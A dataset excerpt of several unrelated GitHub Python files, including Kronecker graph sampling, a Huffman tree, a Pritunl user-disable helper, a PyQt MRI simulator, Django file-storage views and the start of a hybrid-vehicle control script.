case of recursion\n if n == 0:\n return numpy.array(C);\n \n # find the element at the start of the unranked permutation\n for i,s in enumerate(C):\n # we want to test if element s starts the\n # new permutation\n\n # checks for repeated elements to prevent overcounting\n if(i!=0 and s==C[i-1]):\n continue;\n # creates placeholder list and removes s at position i\n place = numpy.delete(C,i)\n # checks if s starts the new permutation. Then start\n # the recursive step to unrank the rest of the list\n if(count_permutations(place) > n-counter):\n return numpy.append(s, unrank(place, n-counter));\n # updates the counter of the total number of permutations\n counter += count_permutations(place);\n\n# map_mult_to_kron takes as input\n# e: an array (probability sequence) consisting of a permutation of letters\n# represented as numbers 0,1,2...(n^2 - 1)\n# n: the dimension of the n x n initiator matrix\n# and returns the corresponding row and column index of the probability sequence\n# in the kronecker product graph matrix\n\ndef map_mult_to_kron(e,n):\n k=len(e);\n I = multindex_to_linear(e,pow(n,2));\n return morton_decode(I,n,k); \n\n# morton_decode takes as input:\n# I: the linear index of a multiset permutation\n# n: the dimension of the n x n initiator matrix\n# k: the Kronecker power\n# and returns the row and column indices of the multiset permutation in the\n# Kronecker matrix as an array with 2 elements\ndef morton_decode(I, n, k):\n #convert I into a base n number\n num = change_base(I,n);\n row=[]\n col=[]\n for i in range(len(num)):\n if i % 2 ==0:\n row.insert(0,num[len(num)-i-1]);\n else:\n col.insert(0,num[len(num)-i-1]);\n r = multindex_to_linear(row, n);\n c = multindex_to_linear(col, n);\n return ([r,c]);\n\n# multindex_to_linear takes as input\n# multind: an array representing a multiset permutation in the\n# multiplication table\n# N: the number of values, n^2, in the n x n initiator matrix\n# and returns the linear index of the multiset permutation\n# note: this algorithm takes a base N string and converts it to base 10\ndef multindex_to_linear(multind, N):\n rank = 0;\n for i in range(len(multind)):\n #finds the lexicographic rank of the multiset by converting it from\n #base N to base 10\n rank += multind[i] * pow(N,len(multind)-i-1);\n return rank;\n\n# change_base takes as input:\n# I: the linear index of a multiset permutation\n# n: the dimension of the n x n initiator matrix\n# and returns an array with I expressed in base n\ndef change_base(I,n):\n num=[]\n while I>= n:\n num.insert(0,I%n);\n I=int(I/n);\n num.insert(0,I);\n return num;\n\n\n#monte_carlo simulation\n# test grass_hop_kron\n# After 1000000 samples (takse a few mins)\n#we'd expect about 0.001 difference based on CLT.\ndef monte_carlo(K,k,N):\n A = numpy.zeros((8,8))\n for t in range(N):\n for e in sample_kronecker_fast(K,k):\n A[e[0],e[1]] += 1\n#print(A/N - np.kron(np.kron(np.array(K),np.array(K)),np.array(K)))\n return numpy.max(abs(A/N - numpy.kron(numpy.kron(numpy.array(K),numpy.array(K)),numpy.array(K))))\n\nprint(monte_carlo([[.99,.5],[.5,.2]],3,10000))\n\n#print(sample_kronecker_fast([.4,.7,.2,.6],2))\n#nx.draw(g);\n#plt.show();\n\n\n \n\n","repo_name":"arjunramani3/generating-random-graphs","sub_path":"fast_grass_kron.py","file_name":"fast_grass_kron.py","file_ext":"py","file_size_in_byte":7744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7856485849","text":"from django.contrib import admin\nfrom .models import Ideia\n\n# Register your models here.\nclass Ideias(admin.ModelAdmin):\n list_display = ('id', 'titulo', 'descricao')\n list_display_links = ('id', 'titulo')\n search_fields = ('titulo',)\n\nadmin.site.register(Ideia, Ideias)","repo_name":"silvacarloss/live-hackaton-web-apps","sub_path":"ideias/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2284344437","text":"class Arbre:\n def __init__(self, frequence, gauche, droit):\n \"\"\" Construit un Arbre\n\n frequence: int\n gauche, droit: Arbre\n \"\"\"\n self.frequence = frequence\n self.gauche = gauche\n self.droit = droit\n\n def affiche(self, prefixes = [' ']):\n \"\"\" Affiche l'arbre \"\"\"\n print(''.join(prefixes[:-1]) + '|___' + str(self.frequence))\n prefixes.append('| ')\n self.gauche.affiche(prefixes)\n prefixes.pop()\n prefixes.append(' ')\n self.droit.affiche(prefixes)\n prefixes.pop()\n\n def node_freq(self):\n return self.frequence\n\n def table_de_codage(self, code='',final_coding_table=None):\n\n if final_coding_table is None:\n final_coding_table = {}\n coding_table = {}\n\n if type(self.gauche) is Feuille:\n coding_table[self.gauche.node_symbol()] = code+'0'\n final_coding_table.update(coding_table)\n elif type(self.gauche) is Arbre:\n Arbre.table_de_codage(self.gauche,code=code+'0',final_coding_table=final_coding_table)\n\n if type(self.droit) is Feuille:\n coding_table[self.droit.node_symbol()] = code+'1'\n final_coding_table.update(coding_table)\n elif type(self.droit) is Arbre:\n Arbre.table_de_codage(self.droit, code=code + '1',final_coding_table=final_coding_table)\n\n return final_coding_table\n\n\nclass Feuille(Arbre):\n def __init__(self, frequence, symbole):\n \"\"\" Construit une feuille\n\n frequence: int\n symbole: str\n \"\"\"\n Arbre.__init__(self, frequence, None, None)\n self.symbole = symbole\n\n def affiche(self, prefixes = [' ']):\n \"\"\" Affiche la feuille \"\"\"\n print(\"\".join(prefixes[:-1]) + '|___' +\n str(self.frequence) +\n '(' + self.symbole + ')')\n\n def node_freq(self):\n return self.frequence\n\n def node_symbol(self):\n return self.symbole\n\n def table_de_codage(self, code=''):\n\n coding_table = {}\n\n coding_table[self.symbole] = code\n\n return coding_table\n\n\n\n\nif __name__ == \"__main__\":\n A = Arbre(18,\n Arbre(8,\n Arbre(3,\n Feuille(1, 'd'),\n Feuille(2, 'c')),\n Feuille(5, 'b')),\n Feuille(10, 'a'))\n A.affiche()\n","repo_name":"vdcmathieu/ue_radiofreq_huffman","sub_path":"class_arbre_feuille.py","file_name":"class_arbre_feuille.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4415203723","text":"import logging\nfrom pritunl_scripts.auth import request\nfrom pritunl_scripts.get_organization import get_organization\nfrom pritunl_scripts.get_user import get_user\n\n\ndef disable_user(organization, username):\n user = get_user(organization, username)\n create = request('PUT','/user/{}/{}'.format(get_organization(organization), user['id']),\n template = {\n 'name': user['name'],\n 'email': user['email'],\n 'disabled': True,\n })\n if create.status_code == 200:\n logging.info('User: {} Disabled'.format(user))\n else:\n return create.status_code\n","repo_name":"fmgervasoni/pritunl-api-client","sub_path":"pritunl_scripts/disable_user.py","file_name":"disable_user.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"23029543824","text":"from phantominator import shepp_logan\nimport matplotlib\nmatplotlib.use(\"Qt5Agg\")\nfrom PyQt5 import QtCore ,uic ,QtWidgets\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QSizePolicy, QFileDialog,QGraphicsScene,QGraphicsView\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nfrom PyQt5.uic import loadUiType\nimport numpy as np\nimport json\nimport pandas as pd\nimport matplotlib.patches as patches\nfrom PIL import Image,ImageEnhance\nfrom matplotlib.widgets import RectangleSelector\nimport matplotlib.pyplot as plt\nfrom threading import Thread\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtGui import QMouseEvent\n\n\n\n\n# Main Figure Canvas class to use them in UI\nclass MyMplCanvas(FigureCanvas):\n \"\"\"Ultimately, this is a QWidget (as well as a FigureCanvasAgg, etc.).\"\"\"\n def __init__(self, parent=None, width=5, height=4, dpi=100):\n fig = Figure(figsize=(width, height), dpi=dpi)\n self.axes = fig.add_subplot(111)\n # We want the axes cleared every time plot() is called\n # self.axes.hold(False)\n self.compute_initial_figure()\n #\n FigureCanvas.__init__(self, fig)\n self.setParent(parent)\n\n FigureCanvas.setSizePolicy(self,\n QSizePolicy.Expanding,\n QSizePolicy.Expanding)\n FigureCanvas.updateGeometry(self)\n\n def compute_initial_figure(self):\n pass\n\n# A Phantom figure canvas with ploting function \nclass phantomMplCanvas(MyMplCanvas , QtWidgets.QMainWindow):\n \"\"\"Simple canvas with a sine plot.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n \n def compute_initial_figure(self ,contrastFactor=float(1), imageSizeIndex = 0 ,imageTypeIndex = 0 , clickedData = {\"clicked\":False , \"X\":0 , \"Y\":0}):\n #generate phantom of specific size\n imageSize = [16 , 32 , 64]\n phantomImg = shepp_logan(imageSize[imageSizeIndex])\n # MR phantom (returns proton density, T1, and T2 maps)\n PD, T1, T2 = shepp_logan((imageSize[imageSizeIndex], imageSize[imageSizeIndex], 20), MR=True)\n imageType = [phantomImg , T1[:,:,15] , T2[:,:,15] , PD[:,:,15]]\n # onclick adding a pixel rectangle around the pixel\n if clickedData[\"clicked\"] == True:\n # Create a Rectangle patch\n x = clickedData[\"X\"]\n y = clickedData[\"Y\"]\n rect = patches.Rectangle((x,y), 1, 1, linewidth=1, edgecolor='r', facecolor='none')\n # Add the patch to the Axes\n self.axes.add_patch(rect)\n # save the image to be easy to control contrast\n plt.imsave('images/tempPhantom.png', imageType[imageTypeIndex], cmap='gray')\n img = Image.open(\"images/tempPhantom.png\")\n img_contr_obj = ImageEnhance.Contrast(img)\n factor = contrastFactor\n e_img = img_contr_obj.enhance(factor)\n arrayImg = np.array(e_img)\n self.axes.imshow(arrayImg, cmap='gray')\n return (str(T1[int(clickedData[\"X\"]) , int(clickedData[\"Y\"]) , 15]) , \n str(T2[int(clickedData[\"X\"]) , int(clickedData[\"Y\"]) , 15]),\n str(PD[int(clickedData[\"X\"]) , int(clickedData[\"Y\"]) , 15]))\n \n#-------------------------------------< MAINWINDOW Code >-----------------------------------------------------\n\n# Create a class for your main window that inherits from Ui_MainWindow and QMainWindow\nclass MainWindow(QtWidgets.QMainWindow):\n def __init__(self, *args, **kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n # -------------link ui file------------------------------#\n uic.loadUi(r'UI/MRI_Simulator.ui', self)\n \n #--------------Adding Phantom figure to layouts-----------#\n self.phantomLayout = self.horizontalLayout_4\n self.phantomCanvas = phantomMplCanvas(self.centralwidget, width=3, height=4, dpi=100)\n self.phantomLayout.addWidget(self.phantomCanvas)# phantom Canvas\n self.phantomCanvas.mpl_connect('button_press_event', self.phantom_onClick)\n self.phantomCanvas.mpl_connect('button_release_event', self.phantom_contrast)\n \n #--------------Adding Sequence figure to layouts-----------#\n self.sequenceLayout = self.verticalLayout_3\n self.sequenceCanvas = MyMplCanvas(self.centralwidget, width=7, height=3, dpi=100)\n self.sequenceLayout.addWidget(self.sequenceCanvas)# sequence Canvas\n\n #--------------Adding Reconstucted image figure to layouts-----------#\n self.Reconstructedimage_graph_layout = self.verticalLayout_6\n self.Reconstructedimage_graph = MyMplCanvas(self.centralwidget, width=3, height=3, dpi=100)\n self.Reconstructedimage_graph_layout.addWidget(self.Reconstructedimage_graph)\n\n #--------------Adding K-sapce figure to layouts-----------#\n self.KspaceLayout = self.verticalLayout_5\n self.Kspace_graph = MyMplCanvas(self.centralwidget, width=3, height=3, dpi=100)\n self.KspaceLayout.addWidget(self.Kspace_graph)\n \n \n # ---------------------Global variables----------------------#\n #sequence variables\n self.Rf_line = 20\n self.Gz_line = 15\n self.Gy_line = 10\n self.Gx_line = 5\n self.Ro_line = 0\n self.JSON_List = []\n\n # contrast variables\n self.contrastFactor = float(1)\n self.minContrast = 0.1\n self.maxContrast = 10\n self.clicked_point = None\n\n # -----------------Connect buttons with functions--------------#\n self.phantomSize_comboBox.activated.connect(lambda:self.phantomImageDraw())\n self.imageTypeCombobox.activated.connect(lambda:self.phantomImageDraw())\n self.actionOpen.triggered.connect(lambda:self.read_file())\n self.Start_Buttun.clicked.connect(lambda: self.make_threading(self.reconstruct_image))\n self.Sequence_Combobox.activated.connect(self.Generate_Sequence)\n self.Value_Line_Edit.textChanged.connect(lambda: self.get_Value())\n self.Ts_Line_Edit.textChanged.connect(lambda: self.get_Ts())\n self.Te_Line_Edit.textChanged.connect(lambda: self.get_Te())\n self.Export_Button.clicked.connect(self.write_file)\n self.TR_Line_Edit.textChanged.connect(lambda: self.get_ReptitionTime())\n self.TEcho_Line_Edit.textChanged.connect(lambda: self.get_EchoTime())\n self.Send_Button.clicked.connect(self.DrawTR_TE)\n self.FA_Line_Edit.textChanged.connect(lambda: self.get_Flip_angle())\n # -----------------------functions defination-----------------------------------#\n def phantom_onClick(self , event: QMouseEvent ):\n print(event.button)\n if event.dblclick :\n T1 ,T2 , PD = self.phantomImageDraw(clicked={\"clicked\":True , \"X\":event.xdata , \"Y\":event.ydata})\n print('%s click: button=%d, x=%d, y=%d, xdata=%f, ydata=%f' %\n ('double' if event.dblclick else 'single', event.button,\n event.x, event.y , event.xdata, event.ydata))\n self.T1value_label.setText(T1)\n self.T2value_label.setText(T2)\n self.PDvalue_label.setText(PD)\n\n if event.button == 1: # Left mouse button\n self.clicked_point = (event.xdata, event.ydata)\n\n def phantom_contrast(self , event ):\n if event.button == 1 and self.clicked_point is not None: # Left mouse button and a point has been clicked\n released_point = (event.xdata, event.ydata)\n dy = released_point[1] - self.clicked_point[1]\n print(f\"Released mouse button on point ({released_point[0]:.2f}, {released_point[1]:.2f}), dy = {dy:.2f}\")\n self.clicked_point = None\n if(dy < 0 ):\n print(\"UP\")\n self.contrastFactor -= dy/10\n elif(dy > 0 ):\n print(\"DOWN\")\n self.contrastFactor -= dy/10\n\n if self.contrastFactor <= self.minContrast:\n self.contrastFactor = self.minContrast\n elif self.contrastFactor >= self.maxContrast:\n self.contrastFactor = self.maxContrast\n print(\"factor is :\" , self.contrastFactor)\n self.phantomImageDraw()\n print(\"done\")\n \n def phantomImageDraw(self ,clicked = {\"clicked\":False , \"X\":0 , \"Y\":0}):\n #current indeces of the phantom size combobox and phantom image combobox\n self.imageSizeIndex = self.phantomSize_comboBox.currentIndex()\n self.imageTypeIndex = self.imageTypeCombobox.currentIndex()\n self.phantomLayout.removeWidget(self.phantomCanvas)# phantom Canvas\n self.phantomCanvas = phantomMplCanvas(self.centralwidget, width=3, height=4, dpi=100)\n T1 ,T2 , PD = self.phantomCanvas.compute_initial_figure(imageSizeIndex = self.imageSizeIndex ,imageTypeIndex = self.imageTypeIndex ,\n clickedData = clicked, contrastFactor=self.contrastFactor)\n self.phantomLayout.addWidget(self.phantomCanvas)# phantom Canvas\n self.phantomCanvas.mpl_connect('button_press_event', self.phantom_onClick)\n self.phantomCanvas.mpl_connect('button_release_event', self.phantom_contrast)\n return(T1 ,T2 , PD)\n\n def read_file(self):# BROWSE TO READ THE FILE\n self.File_Path = QFileDialog.getOpenFileName(self, \"Open File\", \"This PC\",\n \"All Files (*);;JSON Files(*.json)\")\n\n with open(self.File_Path[0], 'r') as handle:\n json_data = [json.loads(line) for line in handle]\n self.df = pd.DataFrame(json_data)\n\n #calling the function that used in plotting mri sequence\n self.Draw_Sequence(self.df)\n\n def get_Value(self):\n if self.Value_Line_Edit.text() != \"\":\n self.value = self.Value_Line_Edit.text()\n return float(self.value)\n\n def get_Ts(self):\n if self.Ts_Line_Edit.text() != \"\":\n self.Ts = self.Ts_Line_Edit.text()\n return float(self.Ts)\n\n def get_Te(self):\n if self.Te_Line_Edit.text() != \"\":\n self.Te = self.Te_Line_Edit.text()\n return float(self.Te)\n\n def Clear_Line_Edits(self):\n self.Value_Line_Edit.clear()\n self.Ts_Line_Edit.clear()\n self.Te_Line_Edit.clear()\n\n def Generate_Sequence(self):\n val = self.get_Value()\n Ts = self.get_Ts()\n Te = self.get_Te()\n if self.Sequence_Combobox.currentIndex()==0:\n self.Draw_RF(val, Ts, Te)\n elif self.Sequence_Combobox.currentIndex()==1:\n self.Draw_Gradients(val, Ts, Te, self.Gz_line)\n elif self.Sequence_Combobox.currentIndex()==2:\n self.Draw_Gradients(val, Ts, Te, self.Gy_line)\n elif self.Sequence_Combobox.currentIndex()==3:\n self.Draw_Gradients(val, Ts, Te, self.Gx_line)\n else:\n self.Draw_Ro(val, Ts, Te)\n self.Clear_Line_Edits()\n\n def Draw_RF(self, val, Ts, Te):\n if (val == 90):\n Rf_amplitude = 3\n elif (val > 90):\n Rf_amplitude = 5\n elif (val < 90):\n Rf_amplitude = 1\n self.plot_Const_Lines()\n x1 = np.linspace(Ts, Te, 1000)\n y1 = self.Rf_line + (Rf_amplitude * np.sinc(x1 - 10))\n self.sequenceCanvas.axes.plot(x1, y1, color='maroon', marker='o')\n self.sequenceCanvas.draw()\n data_1 = {\"Value\": val, \"Ts\": Ts, \"Te\": Te},\n self.JSON_List.append(data_1)\n\n def Draw_Ro(self, val, Ts, Te):\n if (val == 90):\n Ro_amplitude = 3\n elif (val > 90):\n Ro_amplitude = 5\n elif (val < 90):\n Ro_amplitude = 1\n x1 = np.linspace(Ts, Te, 1000)\n y1 = self.Ro_line + (Ro_amplitude * np.sinc(x1 - 55))\n self.sequenceCanvas.axes.plot(x1, y1, color='maroon', marker='o')\n self.sequenceCanvas.draw()\n data_1 = {'Value': val, 'Ts': Ts, 'Te': Te},\n self.JSON_List.append(data_1)\n\n def Draw_Gradients(self, val, Ts, Te, line):\n if (val == 90):\n Gradient_amplitude = 1\n elif (val > 90):\n Gradient_amplitude = 1.06\n elif (val < 90):\n Gradient_amplitude = 0.98\n self.sequenceCanvas.axes.step(x=[Ts, Te, Te], y=[line, (line + 1) * Gradient_amplitude, line])\n self.sequenceCanvas.draw()\n data_1 = {'Value': val, 'Ts': Ts, 'Te': Te},\n self.JSON_List.append(data_1)\n\n def write_file(self):\n with open('Data_Json.json', 'w') as f:\n json.dump(self.JSON_List, f)\n\n def plot_Const_Lines(self):\n self.sequenceCanvas.axes.cla()\n [self.sequenceCanvas.axes.axhline(y=i, color='r', linestyle='-') for i in\n [self.Ro_line, self.Gx_line, self.Gy_line, self.Gz_line, self.Rf_line]]\n self.sequenceCanvas.axes.set_xlabel('t (msec)')\n self.sequenceCanvas.axes.set_yticklabels([0, 'Ro', 'Gx', 'Gy', 'Gz', 'Rf'])\n self.sequenceCanvas.draw()\n\n def get_ReptitionTime(self):\n if self.TR_Line_Edit.text() != \"\":\n self.TR = self.TR_Line_Edit.text()\n return float(self.TR)\n\n def get_EchoTime(self):\n if self.TEcho_Line_Edit.text() != \"\":\n self.TEcho = self.TEcho_Line_Edit.text()\n return float(self.TEcho)\n\n def DrawTR_TE(self):\n for line in self.sequenceCanvas.axes.lines:\n if line.get_color() == 'green':\n line.remove()\n for label in self.sequenceCanvas.axes.texts:\n if label.get_color() == 'green':\n label.remove()\n TR = self.get_ReptitionTime()\n TE = self.get_EchoTime()\n for p,l in zip([TR, TE], ['TR', 'TE']):\n self.sequenceCanvas.axes.axvline(p, color='green', ls='--')\n self.sequenceCanvas.axes.text(p, 23, l, color='green')\n self.sequenceCanvas.draw()\n \n\n\n def Draw_Sequence(self, df):\n self.plot_Const_Lines()\n # plotting functions of Rf,Gz,Gy,Gx,Ro\n x_rf = np.linspace(df[\"RF1_Ts\"].values[0], df[\"RF1_Te\"].values[0], 1000)\n y_rf = self.Rf_line + ((df[\"RF1_value\"].values[0]) * np.sinc(x_rf - 10))\n\n x_ro = np.linspace(df[\"Ro_Ts\"].values[4], df[\"Ro_Te\"].values[4], 1000)\n y_ro = self.Ro_line + ((df[\"Ro_value\"].values[4]) * np.sinc(x_ro - 55))\n\n x_rf2 = np.linspace(df[\"RF2_Ts\"].values[5], df[\"RF2_Te\"].values[5], 1000)\n y_rf2 = self.Rf_line + ((df[\"RF2_value\"].values[5]) * np.sinc(x_rf2 - 80))\n\n self.sequenceCanvas.axes.plot(x_rf, y_rf, color='maroon', marker='o')\n self.sequenceCanvas.axes.step(x=[df[\"Gz_Ts\"].values[1], df[\"Gz_Te\"].values[1], df[\"Gz_Te\"].values[1]],\n y=[self.Gz_line, (self.Gz_line + 1) * df[\"Gz_value\"].values[1], self.Gz_line])\n self.sequenceCanvas.axes.step(x=[df[\"Gy_Ts\"].values[2], df[\"Gy_Te\"].values[2], df[\"Gy_Te\"].values[2]],\n y=[self.Gy_line, (self.Gy_line + 1) * df[\"Gy_value\"].values[2], self.Gy_line])\n self.sequenceCanvas.axes.step(x=[df[\"Gx_Ts\"].values[3], df[\"Gx_Te\"].values[3], df[\"Gx_Te\"].values[3]],\n y=[self.Gx_line, (self.Gx_line + 1) * df[\"Gx_value\"].values[3], self.Gx_line])\n self.sequenceCanvas.axes.plot(x_ro, y_ro, color='maroon', marker='o')\n self.sequenceCanvas.axes.plot(x_rf2, y_rf2, color='maroon', marker='o')\n\n\n # Plotting repeat of Gy if it exists\n if (df[\"Gy_repeated\"].values[2] == \"True\"):\n self.sequenceCanvas.axes.step(x=[df[\"Gy_Ts\"].values[2], df[\"Gy_Te\"].values[2], df[\"Gy_Te\"].values[2]],\n y=[(self.Gy_line + 1), (self.Gy_line + 2) * df[\"Gy_value\"].values[2], (self.Gy_line + 1)])\n self.sequenceCanvas.axes.step(x=[df[\"Gy_Ts\"].values[2], df[\"Gy_Te\"].values[2], df[\"Gy_Te\"].values[2]],\n y=[(self.Gy_line + 2), (self.Gy_line + 3) * df[\"Gy_value\"].values[2], (self.Gy_line + 2)])\n\n # Plotting reverse of Gy if it exists\n if (df[\"Gy_reversed\"].values[2] == \"True\"):\n self.sequenceCanvas.axes.step(x=[df[\"Gy_Ts\"].values[2], df[\"Gy_Te\"].values[2], df[\"Gy_Te\"].values[2]],\n y=[self.Gy_line, ((self.Gy_line + 1) * df[\"Gy_value\"].values[2] * -1) + (self.Gy_line + 1) + 9, self.Gy_line])\n self.sequenceCanvas.axes.step(x=[df[\"Gy_Ts\"].values[2], df[\"Gy_Te\"].values[2], df[\"Gy_Te\"].values[2]],\n y=[(self.Gy_line + 1), ((self.Gy_line + 2) * df[\"Gy_value\"].values[2] * -1) + (self.Gy_line + 1) + 9,\n (self.Gy_line + 1)])\n self.sequenceCanvas.axes.step(x=[df[\"Gy_Ts\"].values[2], df[\"Gy_Te\"].values[2], df[\"Gy_Te\"].values[2]],\n y=[(self.Gy_line + 2), ((self.Gy_line + 3) * df[\"Gy_value\"].values[2] * -1) + (self.Gy_line + 1) + 9,\n (self.Gy_line + 2)])\n\n\n self.sequenceCanvas.axes.axvline(x=df[\"RF1_Te\"].values[0]/2, ls='--')\n\n self.sequenceCanvas.axes.set_xlabel('t (msec)')\n self.sequenceCanvas.axes.set_yticklabels([0,'Ro', 'Gx', 'Gy', 'Gz', 'Rf'])\n self.sequenceCanvas.draw()\n\n\n # Reconstrucing the image\n\n #getting the value of the flip angle\n def get_Flip_angle(self):\n if self.FA_Line_Edit.text() != \"\":\n self.FA = self.FA_Line_Edit.text()\n else:\n self.FA = 90\n return float(self.FA)\n\n # normalizing the image to put the minimum and maximum pixel values between 0 and 255\n def normalize_image(self,image):\n # Find the minimum and maximum pixel values\n min_val = np.min(image)\n max_val = np.max(image)\n\n # Normalize the image using the formula (image - min) / (max - min)\n normalized_image = (image - min_val) / (max_val - min_val)\n\n return normalized_image\n\n # moddifying the image to reconstruct it\n def modify_image(self, Phantom_img):\n normalized_img = self.normalize_image(Phantom_img)\n final_image = np.zeros((Phantom_img.shape[0], Phantom_img.shape[1], 3))\n final_image[:, :, 2] = normalized_img\n return final_image\n\n # matrix of rotation z\n def equ_of_Rotation_z(self, theta):\n rotation_z = np.array(\n [[np.cos(np.radians(theta)), -np.sin(np.radians(theta)), 0],\n [np.sin(np.radians(theta)), np.cos(np.radians(theta)), 0], [0, 0, 1]])\n return rotation_z\n\n # matrix of rotation x\n def equ_of_Rotation_x(self, theta):\n rotation_x = np.array([[1, 0, 0], [0, np.cos(np.radians(theta)), -np.sin(np.radians(theta))],\n [0, np.sin(np.radians(theta)), np.cos(np.radians(theta))]])\n return rotation_x\n\n # applying rotation x to the modified image with the flip angle we want\n def Rotation_x(self, Image, phase_X):\n rotated_image = np.zeros(Image.shape)\n for i in range(0, Image.shape[0]):\n for j in range(0, Image.shape[1]):\n rotated_image[i, j] = np.dot(self.equ_of_Rotation_x(phase_X), Image[i, j])\n\n return rotated_image\n\n # Reconstrucing the image and generating kspace\n # you will find the number of the step in the function\n # step 1 : select the phantom size and modify image and get the flip angle\n # step 2 : start looping over rows and columns of the phantom image and calling the function of rotation x that means we hit rf signal with our flip angle\n # step 3 : we made the phase to make the rotation z (gradient x and y) with it and apply gradient on rows and columns of the image\n # step 4 : we get gradient image, make sumation of values x and y and make the complex value (kspace)\n # step 5 : we plot kspace and image after reconstruction\n def reconstruct_image(self):\n # step 1\n self.Kspace_graph.axes.clear()\n self.Reconstructedimage_graph.axes.clear()\n # choosing size of phantom\n if self.phantomSize_comboBox.currentIndex()==0:\n phantomImg = shepp_logan(16)\n elif self.phantomSize_comboBox.currentIndex()==1:\n phantomImg = shepp_logan(32)\n elif self.phantomSize_comboBox.currentIndex()==2:\n phantomImg = shepp_logan(64)\n else:\n phantomImg = shepp_logan(16)\n\n kSpace = np.zeros((phantomImg.shape[0], phantomImg.shape[1]), dtype=np.complex_)\n modified_img = self.modify_image(phantomImg)\n Phase_of_X = self.get_Flip_angle()\n # step 2\n for R in range(0, modified_img.shape[0]):\n rotated_matrix = self.Rotation_x(modified_img, Phase_of_X)\n for C in range(0, modified_img.shape[1]):\n # step 3\n step_of_Y = (360 / modified_img.shape[0]) * C\n step_of_X = (360 / modified_img.shape[1]) * R\n Final_matrix = np.zeros(modified_img.shape)\n #Applying rotation z in x&y plane\n for i in range(0, modified_img.shape[0]):\n for j in range(0, modified_img.shape[1]):\n phase = step_of_Y * j + step_of_X * i\n Final_matrix[i, j] = np.dot(self.equ_of_Rotation_z(phase), rotated_matrix[i, j])\n # step 4\n #Getting the value of kspace\n gradient_image = Final_matrix\n sum_of_x = np.sum(gradient_image[:, :, 0])\n sum_of_y = np.sum(gradient_image[:, :, 1])\n complex_value = np.complex(sum_of_x, sum_of_y)\n kSpace[R, C] = complex_value\n\n Final_img = np.zeros((phantomImg.shape[0], phantomImg.shape[1], 3))\n Final_img[:, :, 2] = phantomImg\n # step 5\n Kspace_shifted = np.fft.fftshift(kSpace)\n self.Kspace_graph.axes.imshow(np.abs(Kspace_shifted), cmap='gray')\n self.Kspace_graph.draw()\n self.Kspace_graph.start_event_loop(0.0005)\n Reconstructed_image = np.fft.fft2(kSpace)\n self.Reconstructedimage_graph.axes.imshow(np.abs(Reconstructed_image), cmap='gray')\n self.Reconstructedimage_graph.draw()\n self.Reconstructedimage_graph.start_event_loop(0.0005)\n print(R)\n\n def make_threading(self, any_function):\n # create a thread\n thread = Thread(target=any_function)\n # run the thread\n thread.start()\n\nif __name__ == '__main__':\n # Instantiate the main window class and show it\n app = QApplication([])\n window = MainWindow()\n window.show()\n # Run the application\n app.exec_()","repo_name":"Abanoob-Meseha/MRI_Simulator","sub_path":"main_task.py","file_name":"main_task.py","file_ext":"py","file_size_in_byte":22394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43428322238","text":"import json\n\nimport requests\nfrom django.shortcuts import redirect, render\nfrom my_storage_gui.settings import API_EXTERNAL_IP_REDIRECT, API_INTERNAL_IP\n\n\ndef download(request, path):\n try:\n raw = (('?' + request.GET.get('download') + '=yes') if (\n request.GET.get('download')) else '')\n if raw:\n return redirect(\n f'http://{API_EXTERNAL_IP_REDIRECT}/upload{raw}&path={path}')\n dir_tree = requests.get(f'{API_INTERNAL_IP}/dir').json()\n api_response = requests.get(\n f'{API_INTERNAL_IP}/upload', data={'path': path}).json()\n except requests.RequestException as error:\n api_response = {\n 'data': type(error).__name__,\n 'error_message': str(error)\n }\n dir_tree = {'error': 'Unavailable'}\n content = api_response.get('data') or api_response.get('error')\n\n return render(\n request,\n template_name='api_response.html',\n context={\n 'response': json.dumps(api_response, indent=4),\n 'dir_tree': json.dumps(dir_tree, indent=4),\n 'content': content if len(content) <= 30 else (\n 'Large file. Please download it instead.'),\n 'path': path\n }\n )\n\n\ndef upload(request, path):\n file = request.FILES.get('file')\n text = request.POST.get('text', 'empty file content')\n api_response = {'error': text}\n try:\n if file:\n api_response = requests.post(\n f'{API_INTERNAL_IP}/upload',\n files={'file': file},\n data={'path': path}).json()\n else:\n api_response = requests.post(\n f'{API_INTERNAL_IP}/upload',\n data={'path': path, 'text': text}).json()\n dir_tree = requests.get(f'{API_INTERNAL_IP}/dir').json()\n except requests.RequestException as error:\n dir_tree = {'error': 'Unavailable'}\n api_response = {\n 'exception_type': type(error).__name__,\n 'error_message': str(error)\n }\n return render(\n request,\n template_name='api_response.html',\n context={\n 'response': json.dumps(api_response, indent=4),\n 'dir_tree': json.dumps(dir_tree, indent=4),\n 'content': file if file else text\n }\n )\n\n\ndef index(request):\n return render(request, template_name='index.html')\n","repo_name":"rshafikov/my_storage","sub_path":"frontend/files/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4336639589","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n'''\nCreated on Mon Jun 12 16:10:42 2017\n\n@author: Massimo De Mauri\n'''\n\nimport csv\nimport casadi as cs\nimport numpy as np\nimport MIRT_OC as oc\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as ptc\nimport matplotlib as mpl\nfrom matplotlib import cm\nfrom scipy.interpolate import interp1d\nfrom os import path, chdir\nfrom time import time\n\n# local components lib\nfrom models import insight_50kw_power_jc as engine\nfrom models import advisor_em_pwr_sc as electric_motor\nfrom models import battery_hu as battery\n\n\ncurrent_directory = path.abspath(path.dirname(__file__))\nchdir(current_directory)\n\n# ------------------------------------------------\n# Cycle\n# ----------------------------------------------\n\n# import the driving 